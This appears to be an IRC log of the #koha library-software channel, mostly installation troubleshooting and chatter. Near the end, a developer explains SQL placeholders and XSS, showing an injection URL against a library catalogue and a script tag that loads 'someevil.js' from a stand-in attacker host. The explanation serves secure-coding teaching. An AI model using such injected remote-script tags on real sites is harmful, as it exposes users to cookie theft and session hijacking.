← Previous day | Today | Next day → | Search | Index
All times shown according to UTC.
Time | Nick | Message |
---|---|---|
12:03 | |Lupin| | have to run |
12:03 | bye everybody | |
12:03 | ebegin | bye |Lupin| |
12:03 | chris | by |Lupin| |
12:03 | Amit | bye lupin |
12:07 | chris | ok i should get some sleep |
12:07 | Amit | good night chris |
12:08 | ebegin | see you later chris... |
12:08 | marijana | hello, I installe Koha accoridng instructions on opensuse 11.0. I caqnnot start web installer. hmm. where may be an issue? |
12:09 | ebegin | marijana, can you descript what you get when you connect to your address? |
12:09 | descript = describe | |
12:10 | marijana | ebegin: when I type 192.168.0.2:8080 I got only bkank page. when I type 127.0.0.1 I got: It works! |
12:12 | ebegin | Did you use the Standard install mode? |
12:12 | what do you get when you type 127.0.0.1:8080? | |
12:14 | marijana | I got: It works! |
12:14 | ebegin | So it works... :) kidding |
12:15 | Amit | hi marijana |
12:15 | ebegin | alright. Is 192.168.0.2 is your local machine? |
12:16 | marijana | Amit: hi |
12:16 | when I type my address now it says that it cannot find ZOOM.pm | |
12:17 | ebegin: I found out that my Ip is 10.0.2.15 | |
12:17 | ebegin | Oh, that is something else. There was a thread on that lately. If you google on "Koha ZOOM", you should find something helpful. |
12:17 | marijana | when I type: 10.0.2.15:8080 I got message that it cannot find ZOOM.pm |
12:18 | ebegin | marijana, ok. that is a great start. |
12:18 | marijana | I am repeating now in cpan to install ZOOM, waiting for final output |
12:20 | http://pastebin.ca/1496966 | |
12:22 | ebegin | did you got any error when you installed ZOOM? |
12:23 | marijana | http://pastebin.ca/1496967 |
12:23 | should I do force install? | |
12:24 | ebegin | marijana, ok, something went wrong during the install. Do you have the full install log? |
12:25 | marijana | I will putr it on pastebin |
12:25 | http://pastebin.ca/1496969 | |
12:26 | gmcharlt | marijana: based on those messages, I think a force install should be safe |
12:27 | they have to do with connecting to remote servers during the test suite | |
12:28 | marijana | ok I will do force install now |
12:35 | please check this now: http://pastebin.ca/1496973 | |
12:36 | ebegin | looks ok. Can you access 10.0.2.15:8080 now? |
12:36 | marijana | do I have to do again make install etc.? |
12:36 | ebegin | nope |
12:36 | marijana | production mode - trapped fatal error |
12:37 | that is what I got after 10.0.2.15:8080 | |
12:39 | ebegin | Do you have something in koha's log file? |
12:39 | marijana | ebegin: where I can find it? |
12:40 | ebegin | /var/log/koha on the standard install |
12:40 | koha-error_log probably | |
12:41 | marijana | ebegin: file is empty 0 bytes |
12:43 | ebegin | can you try to install CGI::Session::Serialize::yaml |
12:44 | Here is a thread that may help you | |
12:45 | marijana | ebegin I will do that now |
12:48 | shoudl I install again Zoom...? | |
12:48 | ebegin | nope |
12:48 | marijana | ebegin: should I try again to start web installer? |
12:48 | ebegin | yes |
12:50 | marijana, is it working? | |
12:50 | marijana | ebegin: finishing CGI:... installation |
12:50 | ebegin | ok :) |
12:52 | marijana | production mode - trapped fatal error |
12:52 | again | |
12:53 | ebegin | any error during the CGI::Session... install? |
12:56 | marijana | http://pastebin.ca/1496986 |
12:58 | ebegin | Ok. There was problem with some test so it wasn't install, but again, it should be ok to force the install |
12:58 | marijana | ok I will do force install |
13:00 | should I do again ZOOM or something else before doing web install | |
13:00 | production mode - trapped fatal error | |
13:01 | ebegin | anything in your /var/log/koha/koha-error_log file? |
13:02 | Are you sure this is the right log? You can check the log file in your /etc/koha-conf.xml file | |
13:03 | marijana | this is after force installing CGI... http://pastebin.ca/1496991 |
13:03 | ebegin: error log files are still empty | |
13:05 | ebegin | looks like you didn't paste the whole log in your last pastebin |
13:07 | marijana | ebegin: I will check again. I sthat regarding force install of CGI::Session...? |
13:07 | ebegin | yes |
13:09 | marijana | http://pastebin.ca/1496996 |
13:13 | ebegin | marijana, I just read that you need to reinstall CGI::Session. |
13:14 | Actually, here is the message I just found that may help you http://www.nabble.com/Re%3A-Pr[…]-2-p17307900.html | |
13:15 | marijana | should I install again CGI:Session::Serialize::yaml ? |
13:15 | ebegin | No, just CGI::Session. |
13:16 | marijana | should I try again web installer |
13:17 | web installer started, I will complete web istallation now , you deserve a big cold beer :)) | |
13:22 | mahesh | hello |
13:23 | i have small problem with koha | |
13:24 | add item giving a blank page with out any data entry fields | |
13:24 | marijana | ebegin: it is 3.24PM here |
13:24 | ebegin | marijana, where are you? |
13:25 | marijana | ebegin: Belgrade, serbia |
13:29 | ebegin: http://pastebin.ca/1497011I got this message during web install | |
13:30 | ebegin | which database are you using? |
13:30 | marijana | mysql |
13:30 | shoul I alwys login as kohaadmin during web install?\ | |
13:31 | ebegin | yep |
13:32 | marijana, it seems that you hard drive partition is full... | |
13:33 | marijana | ebegin: OK, I will remove something now, wait a second |
13:39 | ebegin: http://pastebin.ca/1497022 | |
13:39 | ebegin: again problem with space? | |
13:40 | ebegin | looks like this, yes. |
13:47 | marijana | it is installed now |
13:48 | ebegin | Congratulation marijana and welcome to the Koha community! |
13:48 | marijana | ebegin: thanks :)) |
13:49 | brb | |
13:49 | gmcharlt | marijana: indeed, congrats and welcome |
13:50 | marijana | :)) |
13:52 | brb | |
14:06 | vedran | ebegin: I am colleague of marijana., she is grateful for your help. I helped her to install KOHA. I installed it on 2 more machines in our school |
14:07 | ebegin: I have to go now. we shall be in touch | |
14:07 | ebegin | I'm glad that I was helpful! |
14:07 | vedran | cya |
14:07 | ebegin | bbye |
14:07 | vedran | ebegin: indeed, very helpfu |
14:07 | :) | |
14:07 | bye | |
15:01 | cato | Hello All; I'm trying to get Koha 3.x to run on CentOS - I was wondering if anyone knows of a guide to do this |
15:03 | jdavidb | cato: I've not done any CentOS work..I rather doubt others have done much, since there's not an install guide already in the kit. Might be a good way to start one! :) |
15:04 | cato | Okay - thanks for letting me know! |
15:05 | jdavidb | Sure thing! Sorry I'm not more help. :P |
15:05 | cato | What does Koha use Zebra for? And is it needed? |
15:07 | jdavidb | You don't strictly *have* to use Zebra, but if you're loading many records at all, it's a very good thing. Zebra is a really good indexing engine. If you try to let MySQL do that by loading without Zebra, performance suffers greatly. |
15:07 | (For very small collections, works fine...but there is a very harsh scalability limit.) | |
15:09 | cato | Oh that makes sense - I was looking at Zerbra - the GNU routing software.. |
15:10 | jdavidb | heh. Spelling counts. :) |
15:10 | cato | So does reading :) |
15:10 | Thanks for the help | |
15:12 | jdavidb | And on Debian, anyway, it's just about an idiot-proof install. No need to compile from source or any of that rot. |
15:12 | cato | Cool. Thanks for letting me know |
15:12 | ebegin | And I'm also doubt about the level of maintenance of Koha no-zebra... maybe I'm wrong about that though... |
15:14 | If it's possible, switch to debian. A lot of people run Koha on debian, this make the install and support easier. | |
15:14 | :) | |
15:14 | jdavidb | ebegin: for the installs I've been involved with, I'm the idiot to protect against, so an idiot-proof install is important to me. |
15:15 | Oh, absolutely! Lots more on Debian than anything else. Most on Etch, but there's a really good Lenny install guide out now. | |
15:24 | gmcharlt | about to hit the road |
15:24 | talk to you all later | |
15:25 | ebegin | @wunder washington DC |
15:25 | munin | ebegin: The current temperature in Eckington Pl, NE, Washington, District of Columbia is 29.7°C (11:24 AM EDT on July 16, 2009). Conditions: Mostly Cloudy. Humidity: 55%. Dew Point: 20.0°C. Pressure: 29.85 in 1010.7 hPa (Steady). |
15:25 | ebegin | @wunder montreal quebec |
15:25 | munin | ebegin: The current temperature in Montreal, Quebec is 18.0°C (11:00 AM EDT on July 16, 2009). Conditions: Light Rain Showers. Humidity: 83%. Dew Point: 15.0°C. Pressure: 29.75 in 1007 hPa (Falling). |
15:25 | kf | @wunder Konstanz |
15:25 | munin | kf: The current temperature in Konstanz, Germany is 28.0°C (5:00 PM CEST on July 16, 2009). Conditions: Scattered Clouds. Humidity: 40%. Dew Point: 17.0°C. Pressure: 30.06 in 1018 hPa (Falling). |
15:26 | jdavidb | @wunder bethesda md |
15:26 | munin | jdavidb: The current temperature in WRC-Tenlytown, Washington, District of Columbia is 30.0°C (11:26 AM EDT on July 16, 2009). Conditions: Mostly Cloudy. Humidity: 62%. Dew Point: 22.0°C. Pressure: 29.98 in 1015.1 hPa (Steady). |
16:31 | joetho | @wunder kansas city kansas |
16:31 | munin | joetho: The current temperature in N 18th and State (near), Kansas City, Kansas is 27.4°C (11:30 AM CDT on July 16, 2009). Conditions: Partly Cloudy. Humidity: 42%. Dew Point: 13.0°C. Pressure: 30.02 in 1016.5 hPa (Rising). |
16:32 | joetho | @wunder iola kansas |
16:32 | munin | joetho: The current temperature in Casa Bravo, Chanute, Kansas is 30.4°C (11:32 AM CDT on July 16, 2009). Conditions: Clear. Humidity: 54%. Dew Point: 20.0°C. Pressure: 30.03 in 1016.8 hPa (Rising). |
16:32 | jdavidb | @wunder Abilene, TX |
16:32 | munin | jdavidb: The current temperature in Heritage Parks, 3.7 Mi NE, Abilene, Texas is 35.6°C (11:31 AM CDT on July 16, 2009). Conditions: Clear. Humidity: 37%. Dew Point: 19.0°C. Pressure: 29.98 in 1015.1 hPa (Falling). |
16:35 | joetho | @wunder my kitchen |
16:35 | munin | joetho: Error: No such location could be found. |
16:36 | joetho | @ wunder place where everyone loves me |
16:36 | munin | joetho: Error: No such location could be found. |
16:36 | joetho | ha ha ha ha |
16:37 | moodaepo | @wunder 10036 |
16:37 | munin | moodaepo: The current temperature in Hunter College, Upper East Side, New York, New York is 28.0°C (12:36 PM EDT on July 16, 2009). Conditions: Clear. Humidity: 53%. Dew Point: 18.0°C. Pressure: 29.19 in 988.4 hPa (Falling). |
16:37 | moodaepo | hmm I thought it was supposed to be Hell's Kitchen |
16:38 | @wunder Hell's Kitchen | |
16:38 | munin | moodaepo: Error: No such location could be found. |
16:38 | jdavidb | @wunder Black Rock City |
16:38 | munin | jdavidb: The current temperature in APRSWXNET Gerlach NV US, Gerlach, Nevada is 26.1°C (9:13 AM PDT on July 16, 2009). Conditions: Clear. Humidity: 22%. Dew Point: 3.0°C. Pressure: 29.83 in 1010.0 hPa (Rising). |
16:38 | jdavidb | I'll be switched. |
16:39 | ebegin | @wunder neverland |
16:39 | munin | ebegin: Error: No such location could be found. |
16:40 | ebegin | @wunder where Kate, Jack, Lock, Saywer are... |
16:40 | munin | ebegin: Error: No such location could be found. |
16:40 | ebegin | ;) |
16:41 | moodaepo | @wunder 99705 |
16:41 | munin | moodaepo: The current temperature in Tombur Subdivision, North Pole, Alaska is 9.2°C (8:41 AM AKDT on July 16, 2009). Conditions: Fog. Humidity: 90%. Dew Point: 8.0°C. Windchill: 9.0°C. Pressure: 30.06 in 1017.8 hPa (Rising). Dense fog advisory in effect until 8 am akdt this morning... |
16:41 | moodaepo | @wunder North Pole |
16:41 | munin | moodaepo: Error: No such location could be found. |
16:42 | moodaepo | aargh enough playing around |
16:42 | : ) | |
16:42 | ebegin | @wunder H0H 0H0 |
16:42 | munin | ebegin: Error: No such location could be found. |
16:42 | ebegin | @wunder H0H0H0 |
16:42 | munin | ebegin: Error: No such location could be found. |
16:42 | ebegin | @wunder H1X3M1 |
16:42 | munin | ebegin: The current temperature in NDG, Montréal, Quebec is 23.5°C (12:41 PM EDT on July 16, 2009). Conditions: Light Rain. Humidity: 62%. Dew Point: 16.0°C. Pressure: 29.62 in 1002.9 hPa (Steady). |
16:42 | Snow_Fox | RHCL: Look out another storm band is headingyour way, love Kansas |
16:44 | heya Piano | |
16:44 | pianohacker | Hi, snow |
16:47 | jdavidb | Howdy, pianohacker! :) |
16:52 | pianohacker | Hallo |
19:48 | dipanjan | who is the CPAN owning user for koha 3.0.3? |
19:49 | pianohacker | dipanjan: I don't think Koha is distributed as a CPAN module. There's a CPAN bundle, with all of Koha's dependencies, but I don't know if that's being actively maintained |
19:50 | owen | dipanjan: Is your question about who is Release Manager for 3.0.3? |
19:51 | dipanjan | pianohacker: when i run the install-CPAN.pl file that came bundled in the koha 3.0.3 tar ball, it says: Run this as the CPAN-owning user (usually root) with: |
19:51 | perl ./install-CPAN.pl path/to/koha.tgz | |
19:51 | pianohacker | Ahh, okay |
19:51 | What that means, is "run this command as a user that has the rights to install CPAN modules" | |
19:51 | That will almost certainly be root | |
19:51 | wizzyrea | so, root |
19:51 | or sudo | |
19:51 | dipanjan | pianohacker: i tried root. it didn't run |
19:51 | pianohacker | dipanjan: So you ran the above command with su or sudo at the front? |
19:51 | What happened? | |
19:51 | wizzyrea | (dipanjan: I've had the same problem. never fixed it. installed by hand) |
19:52 | dipanjan | pianohacker: i did su root |
19:52 | pianohacker: keyed in my password | |
19:52 | pianohacker: and ./install-CPAn.pl | |
19:52 | pianohacker: didn't work | |
19:52 | pianohacker | What error occurred? |
19:53 | dipanjan | pianohacker: it displayed a message: |
19:53 | Run this as the CPAN-owning user (usually root) with: | |
19:53 | perl ./install-CPAN.pl path/to/koha.tgz | |
19:53 | i am using Fedora 10 | |
19:54 | pianohacker | I think what it's asking for is for you to give the path to your koha tarball |
19:54 | So, if your tarball is at ../koha-3.0.3.tar.gz | |
19:54 | You would run | |
19:55 | perl ./install-CPAN.pl ../koha-3.0.3.tar.gz | |
19:55 | wizzyrea | interesting, why the unzipped tarball? |
19:55 | (this part flummoxed me several times as well, I finally gave up on it) | |
19:55 | dipanjan | pianohacker: but the tarball is untarred |
19:55 | wizzyrea | er, why not the unzipped tarball |
19:55 | dipanjan | pianohacker: the install-CPAN.pl was inside the packege |
19:55 | pianohacker | dipanjan: <shrug> I think this step still wants your original zipped tarball |
19:56 | dipanjan | pianohacker: i will try. and come back |
19:56 | wizzyrea | :) |
19:56 | pianohacker | From who? dipanjan, or me? |
19:56 | wizzyrea | all of the above :) |
19:56 | dipanjan | :) |
19:57 | paul_p | hello world. |
19:57 | ebegin | hi paul! |
19:57 | wizzyrea | heya paul_p |
19:57 | pianohacker | Heh. Installing Koha is my least favorite part of using it by far, and it's _improved_ since 2.2 |
19:57 | Heya, paul | |
19:57 | paul_p | hi pianohacker/jesse |
19:57 | hi ebegin | |
19:57 | hello america in fact ;-) | |
19:57 | pianohacker | It's only 8:00 in your part of the world, what are you doing here? |
19:57 | Too early | |
19:58 | paul_p | pianohacker: ??? it's not 8, it's 10PM ! |
19:58 | owen | paul_p: Dubbed? |
19:58 | paul_p | (you're mixing with chris ;-) ) |
19:58 | hello owen | |
19:58 | pianohacker | timezones-- |
19:59 | I guess for some reason I thought you were on GMT time | |
19:59 | dipanjan | pianohacker: something seems to have happened. i will get back when i figure out what :) |
19:59 | paul_p | it's probably strange for an english speaking guy, I agree |
20:00 | pianohacker | dipanjan: Famous last words, but good luck |
20:00 | dipanjan | pianohacker: :) |
20:01 | wizzyrea | @quote add <dipanjan>something seems to have happened. i will get back when i figure out what :) |
20:01 | munin | wizzyrea: Error: You must be registered to use this command. If you are already registered, you must either identify (using the identify command) or add a hostmask matching your current hostmask (using the "hostmask add" command). |
20:01 | wizzyrea | noooooo |
20:01 | identification fail! | |
20:05 | owen | What's @quote do? |
20:06 | pianohacker | owen: Adds a quote (a la bash.org) to munin's quote database |
20:06 | @quote random | |
20:06 | munin | pianohacker: Quote #8: "< wizzyrea> in my experience the transition to koha is much harder for libraries that are already automated" (added by pianohacker at 05:57 PM, June 19, 2009) |
20:07 | owen | I didn't realize I had to be pithy enough for posterity. |
20:08 | wizzyrea | hey, being witty is hard work |
20:09 | pianohacker | Talking in soundbites isn't as hard as you might think |
20:15 | wizzyrea | owen++ |
20:15 | love what you did with the items table | |
20:15 | that is h a w t | |
20:16 | owen | Thanks! |
20:17 | Here's the example if anyone else is interested: http://www.myacpl.org/koha/exa[…]m-2009-07-15.html | |
20:17 | Click any cell in the table of items to get a little edit/delete menu, useful when you've scrolled all the way to the right | |
20:17 | I talk about it here: http://www.myacpl.org/koha/?p=298 | |
20:18 | wizzyrea | yea that is sweeeeet |
20:18 | I approve | |
20:18 | i see what you mean about the confusion though | |
20:19 | pianohacker | Oh-hoh, that's very nice. Perhaps change the links to "_Edit_ / _Delete_ item"? |
20:20 | wizzyrea | or "Edit Item / Delete Item |
20:20 | " | |
20:20 | so it's always right there | |
20:20 | what you are doing | |
20:20 | pianohacker | wizzyrea: That is clearer, but you're working with pretty limited space |
20:20 | wizzyrea | true |
20:21 | owen | Although what the hell, once you're clicking it probably doesn't much matter if you take up a little more space |
20:22 | One thing I didn't mention in the blog post was how to handle making the menu go away completely. Right now my script doesn't handle it | |
20:22 | joetho | This is something we are considering sponsoring |
20:22 | I mean, not you PERSONALLY, | |
20:23 | wizzyrea | it would be even MORE awesome if you could just edit the item there |
20:23 | joetho | but adding a button here or there to reduce scrolloing |
20:23 | wizzyrea | but harder I'm sure |
20:23 | pianohacker | Click-to-edit? |
20:23 | wizzyrea | yessir |
20:23 | owen | Yeah, there's all kinds of Ajaxy stuff that'd be cool to do. |
20:23 | pianohacker | I actually implemented something like that for Circulation and fines rules, but it's been stuck, along with ajaxcirc, in review purgatory for a while |
20:24 | joetho | Never had this with sirsi dynix. |
20:24 | wizzyrea | we'd make slef angry though |
20:24 | :P | |
20:24 | re: ajax happiness | |
20:24 | "angry..." we'd get a talking at | |
20:24 | anyway | |
20:24 | owen | There's already been a complaint about the staff client being "littered" with Ajax calls. |
20:24 | pianohacker | I don't think the additem.pl page works without javascript |
20:25 | atz | one i totally refuted, for the record |
20:25 | pianohacker | This is 200_9_, for god's sake |
20:25 | owen | Yeah, atz++ |
20:25 | pianohacker | My dinky little palm smartphone supports some javascript |
20:25 | wizzyrea | I can appreciate that people with disabilities will need to be able to use it |
20:25 | but it might be better to have a separate template for that? | |
20:26 | 1. for speed and 2. for accommodating people with disabilities | |
20:26 | atz | ppl who just see the web side don't really get how much mechanics there are underneath... how many template files have to get included, javascript files, css files |
20:26 | pianohacker | Maybe. tbh, I think some library might have to get some legal rumblings before that gets sponsored though |
20:26 | wizzyrea | I think you could probably sell it as the "super fast koha interface" |
20:27 | kind of minimalist | |
20:27 | atz | let alone the ornate process of H:T:P generation and authentication... autopopulation |
20:27 | owen | I think that was the telnet interface in 1.0 ;) |
20:27 | pianohacker | See? We just need to bring back the telnet interface |
20:27 | atz | pianohacker: we already have it... it's called SIP |
20:27 | wizzyrea | well there you go |
20:27 | all koha problems solved | |
20:28 | actually... | |
20:28 | atz, that's not a bad idea | |
20:28 | atz | all you have to do is learn 46 numerically coded messages and all their subfields |
20:28 | wizzyrea | yay |
20:28 | pianohacker | atz: Hell, that's difficult enough for a computer |
20:28 | atz | yeah |
20:28 | pianohacker | Wouldn't be much of an obstacle for a cataloger, though |
20:28 | atz | lol |
20:29 | pianohacker | see ya |
20:31 | wizzyrea | sarcasm aside, the web interface isn't really the best interface for ppl with disabilities. And we could do more with the web interface if we'd alternately accommodate for disability. |
20:32 | (just being the devil's advocate here... I'd just as soon go full throttle AJAX and be done with it) | |
20:33 | pianohacker | Yes. I think it might be good to see how far ARIA and some basic accessibility improvements (including the much-discussed Skip to content link) will take us before we commit to maintaining a separate template set, but it's something to think about |
20:33 | Hey, I'm with you | |
20:34 | wizzyrea | but I know there would be resistance >.< |
20:36 | richard | hi |
20:42 | cya paul_p | |
20:48 | wizzyrea | gnite Paul |
21:02 | chris | right at work now |
21:04 | Snow_Fox | hey when it comes to images |
21:04 | what would be the max size that koha can support | |
21:05 | or is it more webbased where i have to keep a certain size or itll mess with the layout | |
21:05 | chris | the latter |
21:05 | pianohacker | Snow_Fox: Depends. What kind of image are you talking about? |
21:05 | Snow_Fox | the Patron Images |
21:05 | pianohacker | I'd go with chris's answer, then |
21:05 | Snow_Fox | thats what i figured |
21:15 | atz | the manual has concrete dimensions i think... |
21:21 | Snow_Fox | anyone in here play with HP's Data Protection Express backup system? |
21:22 | Data Protector Express | |
21:22 | chris | not me |
21:40 | joetho | me neither. Sounds ominous |
21:44 | Snow_Fox | Storage Works? |
01:12 | pianohacker | /Koha's Oddly Enough/: The TemplateEncoding systempreference is used to define the _input_ encoding for an obsolete MARC Record processing function, and nowhere else |
01:42 | 'gnight, #koha | |
03:58 | Amit | hi chris, galen |
03:58 | good morning #koha | |
04:01 | hi ebegin | |
04:02 | ebegin | heya amit! How are you? |
04:02 | Amit | munin: @wunder New Delhi |
04:02 | munin | Amit: downloading the Perl source |
04:02 | ebegin | @wunder new delhi |
04:02 | munin | ebegin: The current temperature in New Delhi, India is 32.0°C (9:00 AM IST on July 17, 2009). Conditions: Haze. Humidity: 66%. Dew Point: 25.0°C. Pressure: 29.50 in 999 hPa (Steady). |
04:02 | Amit | ebegin:I m fine what about u? Sory today i m late |
04:02 | ebegin | #wunder montreal, quebec |
04:02 | Amit | @wunder Dehradun |
04:02 | munin | Amit: The current temperature in Dehradun, India is 27.0°C (8:30 AM IST on July 17, 2009). Conditions: Haze. Humidity: 89%. Dew Point: 25.0°C. Pressure: 29.47 in 998 hPa. |
04:02 | ebegin | @wunder montreal, quebec |
04:02 | munin | ebegin: The current temperature in Montreal, Quebec is 18.0°C (11:50 PM EDT on July 16, 2009). Conditions: Mostly Cloudy. Humidity: N/A%. Pressure: (Rising). |
04:05 | ebegin | bedtime... see you tomorow! |
04:05 | Amit | good night ebegin |
04:37 | hi thd | |
04:37 | thd | hello Amit |
05:39 | Amit | hi indradg |
05:40 | indradg | morning Amit |
06:53 | paul_p | hello world |
06:54 | Amit | hi paul_p |
07:03 | kf | good morning #koha :) |
07:05 | Amit | hi kf |
07:25 | nahuel | hi all |
07:26 | kf | hi nahuel |
07:27 | nahuel | hi kf, what's up in germany ? |
07:29 | Amit | hi nahuel |
07:29 | nahuel | hi Amit |
07:32 | kf | @wunder Konstanz |
07:32 | munin | kf: The current temperature in Taegerwilen, Germany is 18.1°C (9:32 AM CEST on July 17, 2009). Conditions: Light Rain Showers. Humidity: 95%. Dew Point: 17.0°C. Pressure: 29.97 in 1014.8 hPa (Steady). |
07:32 | kf | nahuel: rain, rain and rain |
07:33 | nahuel | here... sun sun sun and sun and heat, heat heat heat heat |
07:33 | kf | cant decide whats better g |
07:35 | nahuel | I think none of both |
07:35 | greenmang0 | hi indradg |
07:35 | indradg | hi greenmang0 |
07:36 | kf | for working on my koha project rain isnt so bad, just coming to work is sometimes a little difficult on these days |
07:36 | Amit | @wunder Bangalore |
07:36 | munin | Amit: Error: No such location could be found. |
07:37 | Amit | @wunder New Delhi |
07:37 | munin | Amit: The current temperature in New Delhi, India is 35.0°C (12:30 PM IST on July 17, 2009). Conditions: Haze. Humidity: 53%. Dew Point: 24.0°C. Pressure: 29.44 in 997 hPa (Falling). |
07:39 | paul_p | wow... 35°... and we complaint with our poor 32° here in marseille... (humidity probably higher than 53% in the evening those days I think) |
07:39 | @wunder Marseille, France | |
07:39 | munin | paul_p: The current temperature in Marseille, France is 24.0°C (9:30 AM CEST on July 17, 2009). Conditions: Scattered Clouds. Humidity: 78%. Dew Point: 20.0°C. Pressure: 29.95 in 1014 hPa (Steady). |
07:40 | paul_p | yep, humidity 78%... |
07:40 | nahuel | kf, it's hard here to come to work, too heat |
07:40 | paul_p | (it's 10AM here) |
07:40 | nahuel | to humid |
07:40 | you arrive sweaty | |
07:52 | chris | evening |
07:53 | paul_p | @wunder wellington |
07:53 | munin | paul_p: Error: No such location could be found. |
07:53 | paul_p | @wunder wellington, new-zealand |
07:53 | munin | paul_p: Error: No such location could be found. |
07:54 | paul_p | NZ is too small... unknow for munin :( |
07:54 | kf | @wunder wellington, nz |
07:54 | munin | kf: The current temperature in Wellington, New Zealand is 10.0°C (7:00 PM NZST on July 17, 2009). Conditions: Scattered Clouds. Humidity: 87%. Dew Point: 8.0°C. Windchill: 8.0°C. Pressure: 29.65 in 1004 hPa (Steady). |
07:54 | kf | :) |
07:54 | saw chris doing it | |
07:54 | paul_p | humidity 87% and 10°C. it's winter... |
07:54 | chris | -i |
07:54 | yes, rainy | |
07:55 | paul_p | (couldn't miss this occasion to laugh a little...) |
07:58 | chris | i think gary might have been at kohacon |
07:58 | Amit | @wunder Bangalore, ind |
07:58 | munin | Amit: Error: No such location could be found. |
07:59 | paul_p | I was not sure. anyway, he did not introduce himself on koha-dev, so my mail is still relevant ;-) |
07:59 | chris | yep :) |
08:11 | indradg | @wunder Kolkata |
08:11 | munin | indradg: The current temperature in Kolkata, India is 30.0°C (12:20 PM IST on July 17, 2009). Conditions: Mostly Cloudy. Humidity: 79%. Dew Point: 26.0°C. Pressure: 29.42 in 996 hPa (Steady). |
08:12 | Amit | chris: where is Egmont National Park in NZ |
08:13 | nahuel | hi chris |
08:13 | ! | |
08:14 | :) | |
08:16 | chris | near new plymouth, around mount taranaki .. west coast of the north island |
08:17 | Amit | Mt. Egmont volcano last erupted in 1755 and is now situated at the centre of Egmont national park. park regulations have ensured the survival of a forest which extends at a 9.5 km radius from the summit of the volcano, the result of which can be seen from space in the form of huge dark green disc. this photo was taken during the sts-110 mission, april 2002. |
08:17 | ||
08:17 | chris | its actually called Mt. Taranaki |
08:18 | that must be old information :) | |
08:19 | Amit | i have seen this on email |
08:20 | chris | http://www.makenewzealandhome.[…]serfiles/image/Mt Taranaki.jpg |
08:21 | Amit | chris: Error The page cannot be found |
08:23 | chris | try http://www.makenewzealandhome.[…]Mt%20Taranaki.jpg |
08:23 | (they both work for me) | |
08:23 | Amit | yes this will open |
08:23 | chris; nice, beautiful | |
08:26 | http://www.doc.govt.nz/parks-a[…]nal-parks/egmont/ | |
08:32 | chris | mason used to work for a library near there amit |
08:32 | Amit | ok |
08:36 | |Lupin| | hello everybody ! |
08:37 | kf | guten morgen lupin! |
08:39 | Amit | hi lupin |
08:40 | |Lupin| | hallo kf wie geht es heute ? |
08:40 | hi Amit :) | |
08:40 | is there any Perl programmer around please ? | |
08:41 | I'd like o know whether Perl has somewhere a function that would cleanup user input so that it can be inserted safely in SQL requests | |
08:41 | so biasically removing the special characters... | |
08:41 | chris | yep |
08:41 | use place holders | |
08:42 | my $query = "INSERT INTO issues (borrowernumber,something) VALUES (?,?)"; | |
08:42 | my $sth = $dbh->prepare($query); | |
08:42 | $sth->execute($variable1,$variable2); | |
08:42 | kf | Lupin: gut, ich hoffe dir auch |
08:43 | chris | DBI will escape the input |
08:44 | |Lupin| | kf: ja, viel mal danke ! |
08:44 | chris: hmm, not sure I understand... | |
08:45 | chris: I'm looking for a function to use on a user-submitted string, before it is used for a search in an sql query | |
08:45 | chris | yes, and the answer is to use placeholders in your query |
08:45 | and put the string in the execute call | |
08:46 | and then DBI will escape it for you | |
08:46 | |Lupin| | chris: ok, excuse me. I'll try to nderstand what you have just said. |
08:46 | chris | eg |
08:46 | my $user_input = "Some string"; | |
08:47 | my $sql = "INSERT into table (some_column) VALUES (?) "; | |
08:47 | my $sth = $dbh->prepare($sql)l | |
08:47 | my $sth = $dbh->prepare($sql)l; (typo before) | |
08:47 | $sth->execute($user_input); | |
08:48 | DBI takes the ? and puts the escaped $user_input in its place | |
08:49 | |Lupin| | chris: okay, got it, thanks a lot ! |
08:49 | chris: and that works for select querys the same way I guess ? | |
08:50 | chris | yep |
08:51 | |Lupin| | great |
08:51 | thanks very much chris | |
08:51 | I don't think I would have found it out by myself | |
08:51 | didn't even know where to look / what to ask for | |
08:51 | (in Google, for instance) | |
08:54 | chris | DBI placeholders ... if you want to read more :) |
08:57 | |Lupin| | chris: sure, thanks |
08:57 | any pointer about writing secure code in Perl, etc. ? | |
08:58 | chris | dont trust any input from users :) |
08:58 | using placeholders will protect you from sql injection attacks | |
09:00 | |Lupin| | chris: yep |
09:00 | chris: protection from injection attacks: god thing. | |
09:00 | chris | http://perldoc.perl.org/perlsec.html |
09:00 | |Lupin| | are the known types of attacks listed somewhere ? |
09:00 | like XSS, injection... | |
09:01 | chris | for XSS you need to escape output |
09:01 | |Lupin| | chris: ah, right, the perlsec manpage |
09:01 | certainly worth reading !! | |
09:01 | chris | quite different |
09:01 | never never never never ever | |
09:01 | take user input, and then output it | |
09:01 | untouched | |
09:02 | (that includes input from a db) | |
09:02 | |Lupin| | chris: rright |
09:02 | chris: yep, I understand | |
09:02 | chris | that will protect your users |
09:02 | |Lupin| | k |
09:02 | chris | and never trusting input will protect you |
09:03 | |Lupin| | ACK |
09:03 | chris | 2 different types of attack, XSS attacks the person using the site |
09:03 | injection attacks the site | |
09:03 | |Lupin| | ok |
09:03 | chris | usually, people use injection attacks to create XSS |
09:03 | to steal users cookies etc | |
09:04 | |Lupin| | difficult for me to see how that can be achieved, concretely |
09:04 | chris | easily |
09:05 | if i can get you to store <script>someting something</script> | |
09:05 | in your db | |
09:05 | and then its output onto a page somewhere | |
09:05 | |Lupin| | chris: for cookies, for example, you have to put some code in the server tha will be sent to the user and then send its cookies to you ? |
09:05 | chris | yeah very easy to do |
09:05 | eg | |
09:06 | |Lupin| | hm so this kind of attacks assumes the user has JS enabled ? |
09:06 | chris | http://acpl.kohalibrary.com/cg[…]opac-search.pl?q=<blink>test<%2Fblink> |
09:07 | (i have fixed this, so latest version of koha isnt susceptible) | |
09:07 | yes, XSS = cross site scripting | |
09:07 | doesnt work without js | |
09:07 | so that lets me embed any html i want and its output unescaped | |
09:08 | |Lupin| | chris: ok, I see. So actually not using js may also have advantages sometimes ! :-) |
09:08 | chris | i could do <script type="text/javascript" src="http://evilserver.com/someevil.js"> |
09:08 | |Lupin| | chris: but the content won't go in the db, will it ? |
09:09 | chris | in this case it doesnt need to |
09:09 | all i need to do is trick someone into going to that page | |
09:09 | |Lupin| | chris: right. |
09:09 | chris | now |
09:09 | |Lupin| | like you give someone a link to your webpage, on which there is this link, and that's it. |
09:09 | chris | yep |
09:10 | if i could get that into the db, say in the libraryname syspreference | |
09:10 | then that would be on every single page in the opac | |
09:10 | and no one would notice | |
09:10 | |Lupin| | ok |
09:11 | and this is avoided by the DBI placeholders you mentionned previously | |
09:11 | chris | no |
09:11 | |Lupin| | no ? |
09:11 | chris | that wont stop someone putting sql in your db |
09:11 | |Lupin| | you meant HTML, didn't you ? |
09:11 | chris | it will stop someone crashing your db and taking control of your server |
09:11 | yep i did | |
